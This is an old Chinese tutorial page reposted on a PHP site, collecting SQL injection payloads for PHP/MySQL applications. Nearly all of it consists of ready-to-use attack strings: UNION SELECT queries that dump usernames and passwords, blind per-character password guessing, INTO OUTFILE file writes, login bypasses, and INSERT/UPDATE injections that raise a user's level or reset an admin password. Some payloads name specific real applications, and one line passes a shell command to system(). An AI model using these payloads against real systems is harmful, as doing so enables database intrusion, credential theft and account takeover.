Heim > Backend-Entwicklung > PHP-Tutorial > 高级php注入方法集锦_php技巧

高级php注入方法集锦_php技巧

PHP中文网
Freigeben: 2016-05-17 09:36:16
Original
996 Leute haben es durchsucht

不论是黑友,还是程序员,都需要了解

'%23  
' and passWord='mypass  
id=-1 union select 1,1,1  
id=-1 union select char(97),char(97),char(97)  
id=1 union select 1,1,1 from members  
id=1 union select 1,1,1 from admin  
id=1 union select 1,1,1 from user  
userid=1 and password=mypass  
userid=1 and mid(password,3,1)=char(112)  
userid=1 and mid(password,4,1)=char(97)  
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)  
' and LENGTH(password)='6(探测密码长度)  
' and LEFT(password,1)='m  
' and LEFT(password,2)='my  
…………………………依次类推  
' union select 1,username,password from user/*  
' union select 1,username,password from user/*  
=' union select 1,username,password from user/* (可以是1或者=后直接跟)  
99999' union select 1,username,password from user/*  
' into outfile 'c:/file.txt (导出文件)  
=' or 1=1 into outfile 'c:/file.txt  
1' union select 1,username,password from user into outfile 'c:/user.txt  
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'  
id=' union select 1,username,password from user into outfile  
id=-1 union select 1,database(),version() (灵活应用查询)
Nach dem Login kopieren

常用查询测试语句,

select * FROM table where 1=1  
select * FROM table where 'uuu'='uuu'  
select * FROM table where 1<>2  
select * FROM table where 3>2  
select * FROM table where 2<3  
select * FROM table where 1  
select * FROM table where 1+1  
select * FROM table where 1--1  
select * FROM table where ISNULL(NULL)  
select * FROM table where ISNULL(COT(0))  
select * FROM table where 1 IS NOT NULL  
select * FROM table where NULL IS NULL  
select * FROM table where 2 BETWEEN 1 AND 3  
select * FROM table where &#39;b&#39; BETWEEN &#39;a&#39; AND &#39;c&#39;  
select * FROM table where 2 IN (0,1,2)  
select * FROM table where CASE WHEN 1>0 THEN 1 END
Nach dem Login kopieren



例如:夜猫下载系统1.0版本

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1  
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user  
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1  
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 
from ymdown_user where id=1 and groupid=1  
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 
from ymdown_user where id=1 (替换,寻找密码)  
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 
from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)  
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 
from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)  
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 
from ymdown_user where id=1 and ord(mid(password,3,1))=51  
…………………………………………………………
Nach dem Login kopieren

例如2:灰色轨迹 变换id进行测试(meteor)

union%20(select%20allowsmilies,public,userid,&#39;0000-0-0&#39;,user(),
version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate  
union%20(select%20allowsmilies,public,userid,&#39;0000-0-0&#39;,pass(),
version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
Nach dem Login kopieren

构造语句:

select allowsmilies,public,userid,eventdate,event,subject 
FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)  
select allowsmilies,public,userid,eventdate,event,subject 
FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)  
union%20(select%201,0,2,&#39;1999-01-01&#39;,&#39;a&#39;,password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate  
union%20(select%201,0,12695,&#39;1999-01-01&#39;,&#39;a&#39;,password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate  
union %20(select%201,0,12695,&#39;1999-01-01&#39;,&#39;a&#39;,userid%20FROM%20user%20where%20username =&#39;sandflee&#39;)%20order%20by%20eventdate (查沙子的id)  
(select a FROM table_name where a=10 AND B=1 ORDER BY a LIMIT 10)  
select * FROM article where articleid=&#39;$id&#39; union select * FROM……(字段和数据库相同情况下,可直接提交)  
select * FROM article where articleid=&#39;$id&#39; union select 1,1,1,1,1,1,1 FROM……(不同的情况下)
Nach dem Login kopieren



特殊技巧:在表单,搜索引擎等地方写:

"___"  
".__ "  
"%  
%&#39; ORDER BY articleid/*  
%&#39; ORDER BY articleid#  
__&#39; ORDER BY articleid/*  
__&#39; ORDER BY articleid#  
$command = "dir c:\";system($command);  
select * FROM article where articleid=&#39;$id&#39;  
select * FROM article where articleid=$id  
1&#39; and 1=2 union select * from user where userid=1/* 句中变为  
(select * FROM article where articleid=&#39;1&#39; and 1=2 union select * from user where userid=1/*&#39;)  
1 and 1=2 union select * from user where userid=1
Nach dem Login kopieren

语句形式:建立一个库,插入:

create DATABASE `injection`  
create TABLE `user` (  
`userid` int(11) NOT NULL auto_increment,  
`username` varchar(20) NOT NULL default &#39;&#39;,  
`password` varchar(20) NOT NULL default &#39;&#39;,  
PRIMARY KEY (`userid`)  
) ;  
insert INTO `user` VALUES (1, &#39;swap&#39;, &#39;mypass&#39;);
Nach dem Login kopieren

插如一个注册用户:

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES (&#39;&#39;, &#39;$username&#39;, &#39;$password&#39;, &#39;$homepage&#39;, &#39;1&#39;);  
"insert INTO membres (login,password,nom,email,userlevel) VALUES (&#39;$login&#39;,&#39;$pass&#39;,&#39;$nom&#39;,&#39;$email&#39;,&#39;1&#39;)";  
insert INTO membres (login,password,nom,email,userlevel) VALUES (&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;3&#39;)#&#39;,&#39;1&#39;)  
"insert INTO membres SET login=&#39;$login&#39;,password=&#39;$pass&#39;,nom=&#39;$nom&#39;,email=&#39;$email&#39;";  
insert INTO membres SET login=&#39;&#39;,password=&#39;&#39;,nom=&#39;&#39;,userlevel=&#39;3&#39;,email=&#39;&#39;  
"insert INTO membres VALUES (&#39;$id&#39;,&#39;$login&#39;,&#39;$pass&#39;,&#39;$nom&#39;,&#39;$email&#39;,&#39;1&#39;)";  
update user SET password=&#39;$password&#39;, homepage=&#39;$homepage&#39; where id=&#39;$id&#39;  
update user SET password=&#39;MD5(mypass)&#39; where username=&#39;admin&#39;#)&#39;, homepage=&#39;$homepage&#39; where id=&#39;$id&#39;  
"update membres SET password=&#39;$pass&#39;,nom=&#39;$nom&#39;,email=&#39;$email&#39; where id=&#39;$id&#39;";  
update membres SET password=&#39;[PASS]&#39;,nom=&#39;&#39;,userlevel=&#39;3&#39;,email=&#39; &#39; where id=&#39;[ID]&#39;  
"update news SET Votes=Votes+1, score=score+$note where idnews=&#39;$id&#39;";
Nach dem Login kopieren

长用函数:

DATABASE()  
USER()  
SYSTEM_USER()  
SESSION_USER()  
CURRENT_USER()
Nach dem Login kopieren

比如:

update article SET title=$title where articleid=1 对应函数  
update article SET title=DATABASE() where id=1  
#把当前数据库名更新到title字段  
update article SET title=USER() where id=1  
#把当前 mysql 用户名更新到title字段  
update article SET title=SYSTEM_USER() where id=1  
#把当前 MySQL 用户名更新到title字段  
update article SET title=SESSION_USER() where id=1  
#把当前 MySQL 用户名更新到title字段  
update article SET title=CURRENT_USER() where id=1  
#把当前会话被验证匹配的用户名更新到title字段  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  
$req = "select * FROM membres where name like &#39;%$search%&#39; ORDER BY name";  
select * FROM membres where name like &#39;%%&#39; ORDER BY uid#%&#39; ORDER BY name  
select * FROM membres where name like &#39;%%&#39; ORDER BY uid#%&#39; ORDER BY name  
select uid FROM admins where login=&#39;&#39; OR &#39;a&#39;=&#39;a&#39; AND password=&#39;&#39; OR &#39;a&#39;=&#39;a&#39; (经典)  
select uid FROM admins where login=&#39;&#39; OR admin_level=1#&#39; AND password=&#39;&#39;  
select * FROM table where msg like &#39;%hop&#39;  
select uid FROM membres where login=&#39;Bob&#39; AND password like &#39;a%&#39;#&#39; AND password=&#39;&#39;  
select * FROM membres where name like &#39;%%&#39; ORDER BY uid#%&#39; ORDER BY name
Nach dem Login kopieren

 以上就是高级php注入方法集锦_php技巧的内容,更多相关内容请关注PHP中文网(m.sbmmt.com)!


Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage